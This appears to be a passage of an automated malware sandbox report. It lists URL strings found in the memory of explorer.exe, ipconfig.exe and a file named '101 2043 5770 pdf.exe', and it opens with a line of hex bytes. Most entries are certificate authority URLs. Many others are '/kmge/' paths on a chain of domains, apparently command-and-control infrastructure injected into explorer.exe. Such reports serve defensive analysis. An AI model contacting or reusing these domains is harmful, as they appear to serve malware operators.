4e 58 48 30 5a 6c 57 67 31 4f 71 4e 6c 6a 69 32 31 6f 77 4f 75 61 57 42 78 4e 59 4f 7a 44 49 68 6a 4a 78 56 58 5f 46 48 64 59 70 48 52 39 35 64 38 79 50 36 66 49 53 32 6a 5f 65 77 78 34 35 64 78 5a 66 74 6d 75 4e 73 7a 42 74 55 4e 57 75 44 31 2d 31 59 32 6a 61 33 71 30 7e 57 49 38 49 7a 7e 64 6d 37 68 64 50 64 61 52 63 77 69 5f 51 6f 59 68 44 6b 4f 49 61 2d 49 50 32 5f 6c 52 45 5f 52 4a

Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000007.00000002.4589318233.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2131057244.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4597265016.0000000007B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com/kmge/www.blucretebistro.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com/kmge/www.mrawkward.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com/kmge/www.gsolartech.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs/kmge/www.hhe-crv220.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbsReferer:
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.com
Source: explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz/kmge/www.bedbillionaire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyzReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com/kmge/www.cq0jt.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com/kmge/www.kickssoccercamp.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz/kmge/www.landfillequip.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyzReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com/kmge/www.szexvideokingyen.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.storeReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com/kmge/www.n5l780.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603845014.0000000010B09000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4594200448.0000000003DD9000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603845014.0000000010B09000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4594200448.0000000003DD9000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com/kmge/www.sejasuapropriachefe.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs/kmge/www.agritamaperkasaindonesia.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbsReferer:
